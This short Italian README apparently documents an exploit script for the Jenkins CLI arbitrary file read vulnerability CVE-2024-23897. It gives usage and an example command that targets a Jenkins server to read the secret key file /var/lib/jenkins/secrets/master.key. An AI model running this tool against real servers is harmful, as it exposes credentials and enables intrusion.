
Jenkins CLI lettura arbitraria (CVE-2024-23897 si applica alle versioni inferiori a 2.442 e LTS 2.426.3)
Leggi le prime 3 righe di qualsiasi file con permesso di lettura per l'utente corrente sul sistema. Lo script utilizza proxychains internamente.
Utilizzo:
python CVE-2024-23897.py <percorso jenkins-cli.jar> <URI target> <percorso file>
Esempio:
python CVE-2024-23897.py /mnt/hgfs/Share/jenkins-cli.jar http://10.10.14.8:8080/ /var/lib/jenkins/secrets/master.key